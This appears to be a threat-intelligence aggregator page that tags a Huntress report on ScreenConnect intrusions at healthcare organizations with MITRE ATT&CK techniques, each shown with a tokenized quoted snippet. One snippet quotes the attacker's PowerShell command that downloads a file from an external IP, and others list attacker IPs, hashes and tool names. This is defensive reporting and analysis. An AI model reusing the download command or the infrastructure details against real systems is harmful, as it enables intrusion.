TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

Bitter Pill | Huntress

2023-11-09 · Read original ↗

ATT&CK techniques detected

12 predictions
T1059.001PowerShell
97%
“##connect instance c was used to run the following powershell command : powershell - command " $ wc = new - object system. net. webclient ; $ wc. downloadfile ( ' http : / / 119. 91. 138 [. ] 133 : 443 / test. xml ', ' c : \ programdata \ test. xml ' ) " almost 20 hours later, on…”
T1219Remote Access Tools
93%
“remote management of these clients to subsequent threat actor abuse. technical indicators of compromise ( iocs ) huntress has identified and urges immediate action upon the following iocs : associated files & payloads name sha256 function test. xml 9f42bf3a61faaab8f86abb3c7f9db41…”
T1059.001PowerShell
80%
“to access the endpoint via screenconnect instance b. there were several pairs of “ connected ” and “ disconnected ” messages in the logs for the “ [ redacted 1 ] ” account until october 28, 2023. on october 28, the “ [ redacted 2 ] ” account was used to access screenconnect insta…”
T1046Network Service Discovery
75%
“##973be9892305132389c8588de ) : a legitimate winpcap version 4. 1. 3 executable. - masscan64. exe ( 174f91806e8bc1c0dea24192f7d4afcefc40a1731827b32939d4f411e8402d75 ) : a compiled version of the masscan tcp port scanner. - veeam. exe ( 45c8716c69f56e26c98369e626e0b47d7ea5e15d3fb3…”
T1219Remote Access Tools
71%
“##er screenconnect instance ids screenconnect instance id description adf02e34cba839d2 screenconnect instance id b, associated with rs. tdsclinical [. ] com e3e2410d655306ff screenconnect instance id c, associated with 45. 66. 230 [. ] 146 4974c38508ef2b18 screenconnect instance …”
T1059.001PowerShell
71%
“, the file s. msi was transferred to the endpoint via the screenconnect instance ; launching this file led to screenconnect instance d being installed on this endpoint, with the instance configured to connect to 185. 12. 45 [. ] 98 on port 8041. it was clear that screenconnect in…”
T1219Remote Access Tools
68%
“bitter pill | huntress in a concerning development within the healthcare sector, huntress has identified a series of unauthorized access that signifies internal reconnaissance and preparation for additional threat actor activity against multiple healthcare organizations. the atta…”
T1059.001PowerShell
50%
“procedures ( ttps ) across both endpoints, as well as multiple intersections in indicators of compromise ( iocs ). specifically, one screenconnect instance ( instance b ) was observed being actively used on both endpoints, the “ [ redacted 1 ] ” account was observed being used to…”
T1574.001DLL
40%
“##servables while researching this event, huntress analysts identified an open directory on 2. 57. 149 [. ] 103, shown in the following figure : in addition to a. msi, the anydesk installer previously discussed, two additional files were located : - b. msi ( f28ee671c0f894154dd8c…”
T1219Remote Access Tools
36%
“procedures ( ttps ) across both endpoints, as well as multiple intersections in indicators of compromise ( iocs ). specifically, one screenconnect instance ( instance b ) was observed being actively used on both endpoints, the “ [ redacted 1 ] ” account was observed being used to…”
T1219Remote Access Tools
34%
“zip in monitored environments makes its association with the screenconnect incidents uncertain. however, the payloads in question match overall observed behaviors in terms of remote access tool installation ( b. msi ) and payloads associated with system survey ( masscan64. exe ) …”
T1204.002Malicious File
33%
“zip in monitored environments makes its association with the screenconnect incidents uncertain. however, the payloads in question match overall observed behaviors in terms of remote access tool installation ( b. msi ) and payloads associated with system survey ( masscan64. exe ) …”

Summary

Huntress has uncovered a series of unauthorized access, revealing a threat actor using ScreenConnect to infiltrate multiple healthcare organizations.